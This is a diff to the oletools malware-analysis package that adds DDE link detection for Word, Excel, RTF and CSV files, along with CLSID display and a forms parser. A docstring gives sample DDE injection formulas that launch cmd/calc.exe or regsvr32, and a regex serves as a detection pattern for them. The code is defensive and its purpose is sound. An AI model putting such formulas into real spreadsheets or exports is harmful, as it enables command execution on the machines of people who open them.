-
# have complete field now, process it
- result_parts.append(process_ole_field(field_contents))
+ new_result = process_doc_field(field_contents)
+ if new_result:
+ result_parts.append(new_result)
# re-set variables for next field
have_start = False
have_sep = False
field_contents = None
elif not have_sep:
+ # we are only interested in the part from start to separator
# check that array does not get too long by accident
if max_size_exceeded:
pass
elif len(field_contents) > OLE_FIELD_MAX_SIZE:
- #print('DEBUG: exceeded max size')
+ logger.debug('field exceeds max size of {0}. Ignore rest'
+ .format(OLE_FIELD_MAX_SIZE))
max_size_exceeded = True
# appending a raw byte to a unicode string here. Not clean but
# all we do later is check for the ascii-sequence 'DDE' later...
+ elif char == 0: # may be a high-byte of a 2-byte codec
+ field_contents += unichr(char)
+ elif char in (10, 13):
+ field_contents += u'\n'
+ elif char < 32:
+ field_contents += u'?'
elif char < 128:
field_contents += unichr(char)
- #print('DEBUG: at idx {:4d}: add byte {} ({})'
- # .format(idx, unichr(char), char))
else:
field_contents += u'?'
- #print('DEBUG: at idx {:4d}: add byte ? ({})'
- # .format(idx, char))
- #print('\nstream len = {}'.format(idx))
- # copy behaviour of process_xml: Just concatenate unicode strings
- return u''.join(result_parts)
+ if max_size_exceeded:
+ logger.debug('big field was not a field after all')
+ logger.debug('Checked {0} characters, found {1} fields'
+ .format(idx, len(result_parts)))
+
+ return result_parts
-def process_ole_storage(ole):
- """ process a "directory" inside an ole stream """
- results = []
- for st in ole.listdir(streams=True, storages=True):
- st_type = ole.get_type(st)
- if st_type == olefile.STGTY_STREAM: # a stream
- stream = None
- links = ''
- try:
- stream = ole.openstream(st)
- #print('Checking stream {0}'.format(st))
- links = process_ole_stream(stream)
- except:
- raise
- finally:
- if stream:
- stream.close()
- if links:
- results.append(links)
- elif st_type == olefile.STGTY_STORAGE: # a storage
- #print('Checking storage {0}'.format(st))
- links = process_ole_storage(st)
- if links:
- results.extend(links)
- else:
- #print('Warning: unexpected type {0} for entry {1}. Ignore it'
- # .format(st_type, st))
- continue
- return results
+def process_doc(ole):
+ """
+ find dde links in word ole (.doc/.dot) file
-def process_ole(filepath):
- """ find dde links in ole file
+ Checks whether files is ppt and returns empty immediately in that case
+ (ppt files cannot contain DDE-links to my knowledge)
like process_xml, returns a concatenated unicode string of dde links or
- empty if none were found. dde-links will still being with the dde[auto] key
+ empty if none were found. dde-links will still begin with the dde[auto] key
word (possibly after some whitespace)
"""
- #print('Looks like ole')
- ole = olefile.OleFileIO(filepath, path_encoding=None)
- text_parts = process_ole_storage(ole)
- return u'\n'.join(text_parts)
-
-
-def process_xml(filepath):
- z = zipfile.ZipFile(filepath)
- data = z.read('word/document.xml')
- z.close()
- # parse the XML data:
- root = ET.fromstring(data)
- text = u''
- # find all the tags 'w:instrText':
- # (each is a chunk of a DDE link)
- for elem in root.iter(TAG_W_INSTRTEXT):
- # concatenate the text of the field, if present:
- if elem.text is not None:
- text += elem.text
-
- for elem in root.iter(TAG_W_FLDSIMPLE):
- # concatenate the attribute of the field, if present:
- if elem.attrib is not None:
- text += elem.attrib[TAG_W_INSTRATTR]
-
- return text
-
-
-def process_file(filepath):
- """ decides to either call process_xml or process_ole """
- if olefile.isOleFile(filepath):
- return process_ole(filepath)
+ logger.debug('process_doc')
+ links = []
+ for sid, direntry in enumerate(ole.direntries):
+ is_orphan = direntry is None
+ if is_orphan:
+ # this direntry is not part of the tree --> unused or orphan
+ direntry = ole._load_direntry(sid)
+ is_stream = direntry.entry_type == olefile.STGTY_STREAM
+ logger.debug('direntry {:2d} {}: {}'
+ .format(sid, '[orphan]' if is_orphan else direntry.name,
+ 'is stream of size {}'.format(direntry.size)
+ if is_stream else
+ 'no stream ({})'.format(direntry.entry_type)))
+ if is_stream:
+ new_parts = process_doc_stream(
+ ole._open(direntry.isectStart, direntry.size))
+ links.extend(new_parts)
+
+ # mimic behaviour of process_docx: combine links to single text string
+ return u'\n'.join(links)
+
+
+def process_xls(filepath):
+ """ find dde links in excel ole file """
+
+ result = []
+ xls_file = None
+ try:
+ xls_file = xls_parser.XlsFile(filepath)
+ for stream in xls_file.iter_streams():
+ if not isinstance(stream, xls_parser.WorkbookStream):
+ continue
+ for record in stream.iter_records():
+ if not isinstance(record, xls_parser.XlsRecordSupBook):
+ continue
+ if record.support_link_type in (
+ xls_parser.XlsRecordSupBook.LINK_TYPE_OLE_DDE,
+ xls_parser.XlsRecordSupBook.LINK_TYPE_EXTERNAL):
+ result.append(record.virt_path.replace(u'\u0003', u' '))
+ return u'\n'.join(result)
+ finally:
+ if xls_file is not None:
+ xls_file.close()
+
+
+def process_docx(filepath, field_filter_mode=None):
+ """ find dde-links (and other fields) in Word 2007+ files """
+ parser = ooxml.XmlParser(filepath)
+ all_fields = []
+ level = 0
+ ddetext = u''
+ for _, subs, depth in parser.iter_xml(tags=TAG_W_P + TAG_W_FLDSIMPLE):
+ if depth == 0: # at end of subfile:
+ level = 0 # reset
+ if subs.tag in TAG_W_FLDSIMPLE:
+ # concatenate the attribute of the field, if present:
+ attrib_instr = subs.attrib.get(ATTR_W_INSTR[0]) or \
+ subs.attrib.get(ATTR_W_INSTR[1])
+ if attrib_instr is not None:
+ all_fields.append(unquote(attrib_instr))
+ continue
+
+ # have a TAG_W_P
+ for curr_elem in subs:
+ # check if w:r; parse children to pull out first FLDCHAR/INSTRTEXT
+ elem = None
+ if curr_elem.tag in TAG_W_R:
+ for child in curr_elem:
+ if child.tag in TAG_W_FLDCHAR or \
+ child.tag in TAG_W_INSTRTEXT:
+ elem = child
+ break
+ if elem is None:
+ continue # no fldchar or instrtext in this w:r
+ else:
+ elem = curr_elem
+ if elem is None:
+ raise ooxml.BadOOXML(filepath,
+ 'Got "None"-Element from iter_xml')
+
+ # check if FLDCHARTYPE and whether "begin" or "end" tag
+ attrib_type = elem.attrib.get(ATTR_W_FLDCHARTYPE[0]) or \
+ elem.attrib.get(ATTR_W_FLDCHARTYPE[1])
+ if attrib_type is not None:
+ if attrib_type == "begin":
+ level += 1
+ if attrib_type == "end":
+ level -= 1
+ if level in (0, -1): # edge-case; level gets -1
+ all_fields.append(ddetext)
+ ddetext = u''
+ level = 0 # reset edge-case
+
+ # concatenate the text of the field, if present:
+ if elem.tag in TAG_W_INSTRTEXT and elem.text is not None:
+ # expand field code if QUOTED
+ ddetext += unquote(elem.text)
+
+ # apply field command filter
+ logger.debug('filtering with mode "{0}"'.format(field_filter_mode))
+ if field_filter_mode in (FIELD_FILTER_ALL, None):
+ clean_fields = all_fields
+ elif field_filter_mode == FIELD_FILTER_DDE:
+ clean_fields = [field for field in all_fields
+ if FIELD_DDE_REGEX.match(field)]
+ elif field_filter_mode == FIELD_FILTER_BLACKLIST:
+ # check if fields are acceptable and should not be returned
+ clean_fields = [field for field in all_fields
+ if not field_is_blacklisted(field.strip())]
+ else:
+ raise ValueError('Unexpected field_filter_mode: "{0}"'
+ .format(field_filter_mode))
+
+ return u'\n'.join(clean_fields)
+
+
+def unquote(field):
+ """TODO: document what exactly is happening here..."""
+ if "QUOTE" not in field or NO_QUOTES:
+ return field
+ # split into components
+ parts = field.strip().split(" ")
+ ddestr = ""
+ for part in parts[1:]:
+ try:
+ character = chr(int(part))
+ except ValueError:
+ character = part
+ ddestr += character
+ return ddestr
+
+
+# "static variables" for field_is_blacklisted:
+FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+')
+FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST)
+FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$')
+
+
+def field_is_blacklisted(contents):
+ """ Check if given field contents matches any in FIELD_BLACKLIST
+
+ A complete parser of field contents would be really complicated, so this
+ function has to make a trade-off. There may be valid constructs that this
+ simple parser cannot comprehend. Most arguments are not tested for validity
+ since that would make this test much more complicated. However, if this
+ parser accepts some field contents, then office is very likely to not
+ complain about it, either.
+ """
+
+ # split contents into "words", (e.g. 'bla' or '\s' or '"a b c"' or '""')
+ words = FIELD_WORD_REGEX.findall(contents)
+ if not words:
+ return False
+
+ # check if first word is one of the commands on our blacklist
+ try:
+ index = FIELD_BLACKLIST_CMDS.index(words[0].lower())
+ except ValueError: # first word is no blacklisted command
+ return False
+ logger.debug(u'trying to match "{0}" to blacklist command {1}'
+ .format(contents, FIELD_BLACKLIST[index]))
+ _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \
+ = FIELD_BLACKLIST[index]
+
+ # check number of args
+ nargs = 0
+ for word in words[1:]:
+ if word[0] == '\\': # note: words can never be empty, but can be '""'
+ break
+ nargs += 1
+ if nargs < nargs_required:
+ logger.debug(u'too few args: found {0}, but need at least {1} in "{2}"'
+ .format(nargs, nargs_required, contents))
+ return False
+ if nargs > nargs_required + nargs_optional:
+ logger.debug(u'too many args: found {0}, but need at most {1}+{2} in '
+ u'"{3}"'
+ .format(nargs, nargs_required, nargs_optional, contents))
+ return False
+
+ # check switches
+ expect_arg = False
+ arg_choices = []
+ for word in words[1+nargs:]:
+ if expect_arg: # this is an argument for the last switch
+ if arg_choices and (word not in arg_choices):
+ logger.debug(u'Found invalid switch argument "{0}" in "{1}"'
+ .format(word, contents))
+ return False
+ expect_arg = False
+ arg_choices = [] # in general, do not enforce choices
+ continue # "no further questions, your honor"
+ elif not FIELD_SWITCH_REGEX.match(word):
+ logger.debug(u'expected switch, found "{0}" in "{1}"'
+ .format(word, contents))
+ return False
+ # we want a switch and we got a valid one
+ switch = word[1]
+
+ if switch in sw_solo:
+ pass
+ elif switch in sw_with_arg:
+ expect_arg = True # next word is interpreted as arg, not switch
+ elif switch == '#' and 'numeric' in sw_format:
+ expect_arg = True # next word is numeric format
+ elif switch == '@' and 'datetime' in sw_format:
+ expect_arg = True # next word is date/time format
+ elif switch == '*':
+ expect_arg = True # next word is format argument
+ arg_choices += ['CHARFORMAT', 'MERGEFORMAT'] # always allowed
+ if 'string' in sw_format:
+ arg_choices += ['Caps', 'FirstCap', 'Lower', 'Upper']
+ if 'numeric' in sw_format:
+ arg_choices = [] # too many choices to list them here
+ else:
+ logger.debug(u'unexpected switch {0} in "{1}"'
+ .format(switch, contents))
+ return False
+
+ # if nothing went wrong sofar, the contents seems to match the blacklist
+ return True
+
+
+def process_xlsx(filepath):
+ """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """
+ dde_links = []
+ parser = ooxml.XmlParser(filepath)
+ for _, elem, _ in parser.iter_xml():
+ tag = elem.tag.lower()
+ if tag == 'ddelink' or tag.endswith('}ddelink'):
+ # we have found a dde link. Try to get more info about it
+ link_info = []
+ if 'ddeService' in elem.attrib:
+ link_info.append(elem.attrib['ddeService'])
+ if 'ddeTopic' in elem.attrib:
+ link_info.append(elem.attrib['ddeTopic'])
+ dde_links.append(u' '.join(link_info))
+
+ # binary parts, e.g. contained in .xlsb
+ for subfile, content_type, handle in parser.iter_non_xml():
+ try:
+ logger.info('Parsing non-xml subfile {0} with content type {1}'
+ .format(subfile, content_type))
+ for record in xls_parser.parse_xlsb_part(handle, content_type,
+ subfile):
+ logger.debug('{0}: {1}'.format(subfile, record))
+ if isinstance(record, xls_parser.XlsbBeginSupBook) and \
+ record.link_type == \
+ xls_parser.XlsbBeginSupBook.LINK_TYPE_DDE:
+ dde_links.append(record.string1 + ' ' + record.string2)
+ except Exception as exc:
+ if content_type.startswith('application/vnd.ms-excel.') or \
+ content_type.startswith('application/vnd.ms-office.'): # pylint: disable=bad-indentation
+ # should really be able to parse these either as xml or records
+ log_func = logger.warning
+ elif content_type.startswith('image/') or content_type == \
+ 'application/vnd.openxmlformats-officedocument.' + \
+ 'spreadsheetml.printerSettings':
+ # understandable that these are not record-base
+ log_func = logger.debug
+ else: # default
+ log_func = logger.info
+ log_func('Failed to parse {0} of content type {1} ("{2}")'
+ .format(subfile, content_type, str(exc)))
+ # in any case: continue with next
+
+ return u'\n'.join(dde_links)
+
+
+class RtfFieldParser(rtfobj.RtfParser):
+ """
+ Specialized RTF parser to extract fields such as DDEAUTO
+ """
+
+ def __init__(self, data):
+ super(RtfFieldParser, self).__init__(data)
+ # list of RtfObjects found
+ self.fields = []
+
+ def open_destination(self, destination):
+ if destination.cword == b'fldinst':
+ logger.debug('*** Start field data at index %Xh'
+ % destination.start)
+
+ def close_destination(self, destination):
+ if destination.cword == b'fldinst':
+ logger.debug('*** Close field data at index %Xh' % self.index)
+ logger.debug('Field text: %r' % destination.data)
+ # remove extra spaces and newline chars:
+ field_clean = destination.data.translate(None, b'\r\n').strip()
+ logger.debug('Cleaned Field text: %r' % field_clean)
+ self.fields.append(field_clean)
+
+ def control_symbol(self, matchobject):
+ # required to handle control symbols such as '\\'
+ # inject the symbol as-is in the text:
+ # TODO: handle special symbols properly
+ self.current_destination.data += matchobject.group()[1:2]
+
+
+RTF_START = b'\x7b\x5c\x72\x74' # == b'{\rt' but does not mess up auto-indent
+
+
+def process_rtf(file_handle, field_filter_mode=None):
+ """ find dde links or other fields in rtf file """
+ all_fields = []
+ data = RTF_START + file_handle.read() # read complete file into memory!
+ file_handle.close()
+ rtfparser = RtfFieldParser(data)
+ rtfparser.parse()
+ all_fields = [field.decode('ascii') for field in rtfparser.fields]
+ # apply field command filter
+ logger.debug('found {1} fields, filtering with mode "{0}"'
+ .format(field_filter_mode, len(all_fields)))
+ if field_filter_mode in (FIELD_FILTER_ALL, None):
+ clean_fields = all_fields
+ elif field_filter_mode == FIELD_FILTER_DDE:
+ clean_fields = [field for field in all_fields
+ if FIELD_DDE_REGEX.match(field)]
+ elif field_filter_mode == FIELD_FILTER_BLACKLIST:
+ # check if fields are acceptable and should not be returned
+ clean_fields = [field for field in all_fields
+ if not field_is_blacklisted(field.strip())]
else:
- return process_xml(filepath)
+ raise ValueError('Unexpected field_filter_mode: "{0}"'
+ .format(field_filter_mode))
+ return u'\n'.join(clean_fields)
+
+
+# threshold when to consider a csv file "small"; also used as sniffing size
+CSV_SMALL_THRESH = 1024
+
+# format of dde link: program-name | arguments ! unimportant
+# can be enclosed in "", prefixed with + or = or - or cmds like @SUM(...)
+CSV_DDE_FORMAT = re.compile(r'\s*"?[=+-@](.+)\|(.+)!(.*)\s*')
+
+# allowed delimiters (python sniffer would use nearly any char). Taken from
+# https://data-gov.tw.rpi.edu/wiki/CSV_files_use_delimiters_other_than_commas
+CSV_DELIMITERS = ',\t ;|^'
+
+
+def process_csv(filepath):
+ """ find dde in csv text
+
+ finds text parts like =cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'! or
+ =MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 [...]
+
+ Hoping here that the :py:class:`csv.Sniffer` determines quote and delimiter
+ chars the same way that excel does. Tested to some extend in unittests.
+
+ This can only find DDE-links, no other "suspicious" constructs (yet).
+
+ Cannot deal with unicode files yet (need more than just use uopen()).
+ """
+ results = []
+ if sys.version_info.major <= 2:
+ open_arg = dict(mode='rb')
+ else:
+ open_arg = dict(newline='')
+ with open(filepath, **open_arg) as file_handle:
+ # TODO: here we should not assume this is a file on disk, filepath can be a file object
+ results, dialect = process_csv_dialect(file_handle, CSV_DELIMITERS)
+ is_small = file_handle.tell() < CSV_SMALL_THRESH
+
+ if is_small and not results:
+ # easy to mis-sniff small files. Try different delimiters
+ logger.debug('small file, no results; try all delimiters')
+ file_handle.seek(0)
+ other_delim = CSV_DELIMITERS.replace(dialect.delimiter, '')
+ for delim in other_delim:
+ try:
+ file_handle.seek(0)
+ results, _ = process_csv_dialect(file_handle, delim)
+ except csv.Error: # e.g. sniffing fails
+ logger.debug('failed to csv-parse with delimiter {0!r}'
+ .format(delim))
+
+ if is_small and not results:
+ # try whole file as single cell, since sniffing fails in this case
+ logger.debug('last attempt: take whole file as single unquoted '
+ 'cell')
+ file_handle.seek(0)
+ match = CSV_DDE_FORMAT.match(file_handle.read(CSV_SMALL_THRESH))
+ if match:
+ results.append(u' '.join(match.groups()[:2]))
+
+ return u'\n'.join(results)
+
+
+def process_csv_dialect(file_handle, delimiters):
+ """ helper for process_csv: process with a specific csv dialect """
+ # determine dialect = delimiter chars, quote chars, ...
+ dialect = csv.Sniffer().sniff(file_handle.read(CSV_SMALL_THRESH),
+ delimiters=delimiters)
+ dialect.strict = False # microsoft is never strict
+ logger.debug('sniffed csv dialect with delimiter {0!r} '
+ 'and quote char {1!r}'
+ .format(dialect.delimiter, dialect.quotechar))
+
+ # rewind file handle to start
+ file_handle.seek(0)
+
+ # loop over all csv rows and columns
+ results = []
+ reader = csv.reader(file_handle, dialect)
+ for row in reader:
+ for cell in row:
+ # check if cell matches
+ match = CSV_DDE_FORMAT.match(cell)
+ if match:
+ results.append(u' '.join(match.groups()[:2]))
+ return results, dialect
+
+
+#: format of dde formula in excel xml files
+XML_DDE_FORMAT = CSV_DDE_FORMAT
+
+
+def process_excel_xml(filepath):
+ """ find dde links in xml files created with excel 2003 or excel 2007+
+
+ TODO: did not manage to create dde-link in the 2007+-xml-format. Find out
+ whether this is possible at all. If so, extend this function
+ """
+ dde_links = []
+ parser = ooxml.XmlParser(filepath)
+ for _, elem, _ in parser.iter_xml():
+ tag = elem.tag.lower()
+ if tag != 'cell' and not tag.endswith('}cell'):
+ continue # we are only interested in cells
+ formula = None
+ for key in elem.keys():
+ if key.lower() == 'formula' or key.lower().endswith('}formula'):
+ formula = elem.get(key)
+ break
+ if formula is None:
+ continue
+ logger.debug(u'found cell with formula {0}'.format(formula))
+ match = re.match(XML_DDE_FORMAT, formula)
+ if match:
+ dde_links.append(u' '.join(match.groups()[:2]))
+ return u'\n'.join(dde_links)
+
+
+def process_file(filepath, field_filter_mode=None):
+ """ decides which of the process_* functions to call """
+ if olefile.isOleFile(filepath):
+ logger.debug('Is OLE. Checking streams to see whether this is xls')
+ if xls_parser.is_xls(filepath):
+ logger.debug('Process file as excel 2003 (xls)')
+ return process_xls(filepath)
+ if is_ppt(filepath):
+ logger.debug('is ppt - cannot have DDE')
+ return u''
+ logger.debug('Process file as word 2003 (doc)')
+ with olefile.OleFileIO(filepath, path_encoding=None) as ole:
+ return process_doc(ole)
+
+ with open(filepath, 'rb') as file_handle:
+ # TODO: here we should not assume this is a file on disk, filepath can be a file object
+ if file_handle.read(4) == RTF_START:
+ logger.debug('Process file as rtf')
+ return process_rtf(file_handle, field_filter_mode)
+
+ try:
+ doctype = ooxml.get_type(filepath)
+ logger.debug('Detected file type: {0}'.format(doctype))
+ except Exception as exc:
+ logger.debug('Exception trying to xml-parse file: {0}'.format(exc))
+ doctype = None
+
+ if doctype == ooxml.DOCTYPE_EXCEL:
+ logger.debug('Process file as excel 2007+ (xlsx)')
+ return process_xlsx(filepath)
+ if doctype in (ooxml.DOCTYPE_EXCEL_XML, ooxml.DOCTYPE_EXCEL_XML2003):
+ logger.debug('Process file as xml from excel 2003/2007+')
+ return process_excel_xml(filepath)
+ if doctype in (ooxml.DOCTYPE_WORD_XML, ooxml.DOCTYPE_WORD_XML2003):
+ logger.debug('Process file as xml from word 2003/2007+')
+ return process_docx(filepath)
+ if doctype is None:
+ logger.debug('Process file as csv')
+ return process_csv(filepath)
+ # could be docx; if not: this is the old default code path
+ logger.debug('Process file as word 2007+ (docx)')
+ return process_docx(filepath, field_filter_mode)
+
+
+# === MAIN =================================================================
+
+
+def process_maybe_encrypted(filepath, passwords=None, crypto_nesting=0,
+ **kwargs):
+ """
+ Process a file that might be encrypted.
+
+ Calls :py:func:`process_file` and if that fails tries to decrypt and
+ process the result. Based on recommendation in module doc string of
+ :py:mod:`oletools.crypto`.
+
+ :param str filepath: path to file on disc.
+ :param passwords: list of passwords (str) to try for decryption or None
+ :param int crypto_nesting: How many decryption layers were already used to
+ get the given file.
+ :param kwargs: same as :py:func:`process_file`
+ :returns: same as :py:func:`process_file`
+ """
+ # TODO: here filepath may also be a file in memory, it's not necessarily on disk
+ result = u''
+ try:
+ result = process_file(filepath, **kwargs)
+ if not crypto.is_encrypted(filepath):
+ return result
+ except Exception:
+ logger.debug('Ignoring exception:', exc_info=True)
+ if not crypto.is_encrypted(filepath):
+ raise
+
+ # we reach this point only if file is encrypted
+ # check if this is an encrypted file in an encrypted file in an ...
+ if crypto_nesting >= crypto.MAX_NESTING_DEPTH:
+ raise crypto.MaxCryptoNestingReached(crypto_nesting, filepath)
+
+ decrypted_file = None
+ if passwords is None:
+ passwords = crypto.DEFAULT_PASSWORDS
+ else:
+ passwords = list(passwords) + crypto.DEFAULT_PASSWORDS
+ try:
+ logger.debug('Trying to decrypt file')
+ decrypted_file = crypto.decrypt(filepath, passwords)
+ if not decrypted_file:
+ logger.error('Decrypt failed, run with debug output to get details')
+ raise crypto.WrongEncryptionPassword(filepath)
+ logger.info('Analyze decrypted file')
+ result = process_maybe_encrypted(decrypted_file, passwords,
+ crypto_nesting+1, **kwargs)
+ finally: # clean up
+ try: # (maybe file was not yet created)
+ os.unlink(decrypted_file)
+ except Exception:
+ logger.debug('Ignoring exception closing decrypted file:',
+ exc_info=True)
+ return result
-#=== MAIN =================================================================
def main(cmd_line_args=None):
""" Main function, called if this file is called as a script
@@ -321,37 +974,33 @@ def main(cmd_line_args=None):
"""
args = process_args(cmd_line_args)
- if args.json:
- jout = []
- jout.append(BANNER_JSON)
- else:
- # print banner with version
- print(BANNER)
+ # Setup logging to the console:
+ # here we use stdout instead of stderr by default, so that the output
+ # can be redirected properly.
+ log_helper.enable_logging(args.json, args.loglevel, stream=sys.stdout)
- if not args.json:
- print('Opening file: %s' % args.filepath)
+ if args.nounquote:
+ global NO_QUOTES
+ NO_QUOTES = True
+
+ logger.print_str(BANNER)
+ logger.print_str('Opening file: %s' % args.filepath)
text = ''
return_code = 1
try:
- text = process_file(args.filepath)
+ text = process_maybe_encrypted(
+ args.filepath, args.password,
+ field_filter_mode=args.field_filter_mode)
return_code = 0
except Exception as exc:
- if args.json:
- jout.append(dict(type='error', error=type(exc).__name__,
- message=str(exc))) # strange: str(exc) is enclosed in ""
- else:
- raise
+ logger.exception(str(exc))
- if args.json:
- for line in text.splitlines():
- jout.append(dict(type='dde-link', link=line.strip()))
- json.dump(jout, sys.stdout, check_circular=False, indent=4)
- print() # add a newline after closing "]"
- return return_code # required if we catch an exception in json-mode
- else:
- print ('DDE Links:')
- print(text)
+ logger.print_str('DDE Links:')
+ for link in text.splitlines():
+ logger.print_str(text, type='dde-link')
+
+ log_helper.end_logging()
return return_code
diff --git a/oletools/olebrowse.py b/oletools/olebrowse.py
index ccfb0a92..74bba029 100644
--- a/oletools/olebrowse.py
+++ b/oletools/olebrowse.py
@@ -12,7 +12,7 @@
olebrowse is part of the python-oletools package:
http://www.decalage.info/python/oletools
-olebrowse is copyright (c) 2012-2017, Philippe Lagadec (http://www.decalage.info)
+olebrowse is copyright (c) 2012-2019, Philippe Lagadec (http://www.decalage.info)
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
@@ -41,8 +41,9 @@
# 2012-09-17 v0.01 PL: - first version
# 2014-11-29 v0.02 PL: - use olefile instead of OleFileIO_PL
# 2017-04-26 v0.51 PL: - fixed absolute imports (issue #141)
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
#------------------------------------------------------------------------------
# TODO:
@@ -68,8 +69,8 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty.easygui import easygui
-from oletools.thirdparty import olefile
+import easygui
+import olefile
from oletools import ezhexviewer
ABOUT = '~ About olebrowse'
diff --git a/oletools/oledir.py b/oletools/oledir.py
index 80442e80..42cda7e7 100644
--- a/oletools/oledir.py
+++ b/oletools/oledir.py
@@ -14,7 +14,7 @@
#=== LICENSE ==================================================================
-# oledir is copyright (c) 2015-2017 Philippe Lagadec (http://www.decalage.info)
+# oledir is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -48,8 +48,12 @@
# 2016-08-09 PL: - fixed issue #77 (imports from thirdparty dir)
# 2017-03-08 v0.51 PL: - fixed absolute imports, added optparse
# - added support for zip files and wildcards
+# 2018-04-11 v0.53 PL: - added table displaying storage tree and CLSIDs
+# 2018-04-13 PL: - moved KNOWN_CLSIDS to common.clsid
+# 2018-08-28 v0.54 PL: - olefile is now a dependency
+# 2018-10-06 - colorclass is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
#------------------------------------------------------------------------------
# TODO:
@@ -60,6 +64,13 @@
import sys, os, optparse
+import olefile
+import colorclass
+
+# On Windows, colorclass needs to be enabled:
+if os.name == 'nt':
+ colorclass.Windows.enable(auto_colors=True)
+
# IMPORTANT: it should be possible to run oletools directly as scripts
# in any directory without installing them with pip or setup.py.
# In that case, relative imports are NOT usable.
@@ -72,23 +83,9 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-# we also need the thirdparty dir for colorclass
-# TODO: remove colorclass from thirdparty, make it a dependency
-_thirdparty_dir = os.path.normpath(os.path.join(_thismodule_dir, 'thirdparty'))
-# print('_thirdparty_dir = %r' % _thirdparty_dir)
-if not _thirdparty_dir in sys.path:
- sys.path.insert(0, _thirdparty_dir)
-
-import colorclass
-
-# On Windows, colorclass needs to be enabled:
-if os.name == 'nt':
- colorclass.Windows.enable(auto_colors=True)
-
-from oletools.thirdparty import olefile
from oletools.thirdparty.tablestream import tablestream
from oletools.thirdparty.xglob import xglob
-
+from oletools.common.clsid import KNOWN_CLSIDS
# === CONSTANTS ==============================================================
@@ -105,7 +102,7 @@
STORAGE_COLORS = {
olefile.STGTY_EMPTY: 'green',
- olefile.STGTY_STORAGE: 'blue',
+ olefile.STGTY_STORAGE: 'cyan',
olefile.STGTY_STREAM: 'yellow',
olefile.STGTY_LOCKBYTES: 'magenta',
olefile.STGTY_PROPERTY: 'magenta',
@@ -127,6 +124,13 @@ def sid_display(sid):
else:
return sid
+def clsid_display(clsid):
+ if clsid in KNOWN_CLSIDS:
+ clsid += '\n%s' % KNOWN_CLSIDS[clsid]
+ color = 'yellow'
+ if 'CVE' in clsid:
+ color = 'red'
+ return (clsid, color)
# === MAIN ===================================================================
@@ -227,9 +231,38 @@ def main():
# t.add_row((id, status, entry_type, name, left, right, child, hex(d.isectStart), d.size))
table.write_row((id, status, entry_type, name, left, right, child, '%X' % d.isectStart, d.size),
colors=(None, status_color, etype_color, None, None, None, None, None, None))
+
+ table = tablestream.TableStream(column_width=[4, 28, 6, 38],
+ header_row=('id', 'Name', 'Size', 'CLSID'),
+ style=tablestream.TableStyleSlim)
+ rootname = ole.get_rootentry_name()
+ entry_id = 0
+ clsid = ole.root.clsid
+ clsid_text, clsid_color = clsid_display(clsid)
+ table.write_row((entry_id, rootname, '-', clsid_text),
+ colors=(None, 'cyan', None, clsid_color))
+ for entry in sorted(ole.listdir(storages=True)):
+ name = entry[-1]
+ # handle non-printable chars using repr(), remove quotes:
+ name = repr(name)[1:-1]
+ name_color = None
+ if ole.get_type(entry) in (olefile.STGTY_STORAGE, olefile.STGTY_ROOT):
+ name_color = 'cyan'
+ indented_name = ' '*(len(entry)-1) + name
+ entry_id = ole._find(entry)
+ try:
+ size = ole.get_size(entry)
+ except:
+ size = '-'
+ clsid = ole.getclsid(entry)
+ clsid_text, clsid_color = clsid_display(clsid)
+ table.write_row((entry_id, indented_name, size, clsid_text),
+ colors=(None, name_color, None, clsid_color))
+
+
ole.close()
# print t
if __name__ == '__main__':
- main()
\ No newline at end of file
+ main()
diff --git a/oletools/oleform.py b/oletools/oleform.py
new file mode 100644
index 00000000..d1fc6910
--- /dev/null
+++ b/oletools/oleform.py
@@ -0,0 +1,557 @@
+#!/usr/bin/env python
+"""
+oleform.py
+
+oleform is a python module to parse VBA forms in Microsoft Office files.
+
+Authors: see https://github.com/decalage2/oletools/commits/master/oletools/oleform.py
+License: BSD, see source code or documentation
+
+oleform is part of the python-oletools package:
+http://www.decalage.info/python/oletools
+"""
+
+# === LICENSE ==================================================================
+
+# oletools is copyright (c) 2012-2020 Philippe Lagadec (http://www.decalage.info)
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without modification,
+# are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice, this
+# list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+# REFERENCES:
+# - MS-OFORMS: https://msdn.microsoft.com/en-us/library/office/cc313125%28v=office.12%29.aspx?f=255&MSPPError=-2147217396
+
+# CHANGELOG:
+# 2018-02-19 v0.53 PL: - fixed issue #260, removed long integer literals
+
+import struct
+
+class OleFormParsingError(Exception):
+ pass
+
+class Mask(object):
+ def __init__(self, val):
